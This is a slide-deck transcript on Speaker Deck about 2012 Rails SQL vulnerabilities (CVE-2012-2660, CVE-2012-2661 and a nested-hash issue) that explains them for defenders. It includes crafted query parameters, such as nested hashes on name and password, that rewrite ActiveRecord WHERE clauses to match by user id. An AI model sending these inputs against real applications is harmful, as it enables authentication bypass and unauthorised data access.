Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
84
0
Share
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
160
The Evolution of Rails Security
presidentbeef
1
860
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
160
Practical Static Analysis for Continuous Application Security
presidentbeef
0
230
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
480
Continuous Security with Practical Static Analysis
presidentbeef
1
360
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
270
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
270
Other Decks in Programming
See All in Programming
今こそ押さえておきたい アマゾンウェブサービス(AWS)の データベースの基礎 おもクラ #6版
satoshi256kbyte
1
230
Vibe하게 만드는 Flutter GenUI App With ADK , 박제창, BWAI Incheon 2026
itsmedreamwalker
0
540
ハンズオンで学ぶクラウドネイティブ
tatsukiminami
0
110
AIエージェントで業務改善してみた
taku271
0
500
Reactive ❤️ Loom: A Forbidden Love Story
franz1981
2
230
おれのAgentic Coding 2026/03
tsukasagr
1
140
의존성 주입과 모듈화
fornewid
0
120
AI時代のPhpStorm最新事情 #phpcon_odawara
yusuke
0
140
脱 雰囲気実装! AgentCoreを良い感じに WEBアプリケーションに組み込むために
takuyay0ne
3
440
YJITとZJITにはイカなる違いがあるのか?
nakiym
0
140
LM Linkで(非力な!)ノートPCでローカルLLM
seosoft
0
420
「話せることがない」を乗り越える 〜日常業務から登壇テーマをつくる思考法〜
shoheimitani
3
270
Featured
See All Featured
How to build a perfect <img>
jonoalderson
1
5.4k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
16
1.9k
Leveraging LLMs for student feedback in introductory data science courses - posit::conf(2025)
minecr
1
220
The Spectacular Lies of Maps
axbom
PRO
1
680
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.6k
State of Search Keynote: SEO is Dead Long Live SEO
ryanjones
0
170
How To Speak Unicorn (iThemes Webinar)
marktimemedia
1
430
[RailsConf 2023] Rails as a piece of cake
palkan
59
6.5k
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
tammyeverts
11
880
How To Stay Up To Date on Web Technology
chriscoyier
790
250k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.7k
A Modern Web Designer's Workflow
chriscoyier
698
190k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
satoshi256kbyte
itsmedreamwalker
tatsukiminami
taku271
franz1981
tsukasagr
fornewid
yusuke
takuyay0ne
nakiym
seosoft
shoheimitani
jonoalderson
reverentgeek
minecr
axbom
tammyeverts
ryanjones
marktimemedia
palkan
chriscoyier
thoeni
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
